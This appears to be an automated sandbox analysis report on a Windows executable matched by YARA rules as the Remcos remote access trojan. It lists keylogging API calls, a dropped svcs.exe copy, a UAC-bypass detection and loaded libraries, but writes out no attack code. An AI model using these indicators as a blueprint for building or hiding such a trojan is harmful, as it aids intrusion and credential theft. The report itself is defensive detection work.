Source: C:\Users\user\Desktop\1m70ggeepT.exe | Code function: 0_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_0040A3E0

                      E-Banking Fraud

                      Source: Yara match File source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara match File source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara match File source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0041C9E2 SystemParametersInfoW, 0_2_0041C9E2
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0041C9E2 SystemParametersInfoW, 3_2_0041C9E2

                      System Summary

                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Process Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 0_2_004132D2
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 0_2_0041BB09
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 0_2_0041BB35
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 3_2_004132D2
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 3_2_0041BB09
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 3_2_0041BB35
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_004167B4
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 3_2_004167B4
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0043E0CC 0_2_0043E0CC
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0041F0FA 0_2_0041F0FA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00454159 0_2_00454159
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00438168 0_2_00438168
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_004461F0 0_2_004461F0
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0043E2FB 0_2_0043E2FB
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0045332B 0_2_0045332B
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0042739D 0_2_0042739D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_004374E6 0_2_004374E6
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0043E558 0_2_0043E558
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00438770 0_2_00438770
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_004378FE 0_2_004378FE
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00433946 0_2_00433946
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0044D9C9 0_2_0044D9C9
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00427A46 0_2_00427A46
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0041DB62 0_2_0041DB62
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00427BAF 0_2_00427BAF
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00437D33 0_2_00437D33
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00435E5E 0_2_00435E5E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00426E0E 0_2_00426E0E
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_0043DE9D 0_2_0043DE9D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00413FCA 0_2_00413FCA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: 0_2_00436FEA 0_2_00436FEA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0043E0CC 3_2_0043E0CC
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0041F0FA 3_2_0041F0FA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00454159 3_2_00454159
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00438168 3_2_00438168
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_004461F0 3_2_004461F0
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0043E2FB 3_2_0043E2FB
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0045332B 3_2_0045332B
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0042739D 3_2_0042739D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_004374E6 3_2_004374E6
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0043E558 3_2_0043E558
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00438770 3_2_00438770
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_004378FE 3_2_004378FE
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00433946 3_2_00433946
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0044D9C9 3_2_0044D9C9
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00427A46 3_2_00427A46
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0041DB62 3_2_0041DB62
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00427BAF 3_2_00427BAF
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00437D33 3_2_00437D33
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00435E5E 3_2_00435E5E
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00426E0E 3_2_00426E0E
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_0043DE9D 3_2_0043DE9D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00413FCA 3_2_00413FCA
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: 3_2_00436FEA 3_2_00436FEA
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: String function: 00434E10 appears 54 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: String function: 00434770 appears 42 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Code function: String function: 00401E65 appears 35 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: String function: 00434E10 appears 54 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: String function: 00402093 appears 50 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: String function: 00434770 appears 42 times
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Code function: String function: 00401E65 appears 34 times
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: propsys.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: edputil.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: slc.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: sppc.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\1m70ggeepT.exe Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe Section loaded: kernel.appcore.dll
                      Source: 1m70ggeepT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1m70ggeepT.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
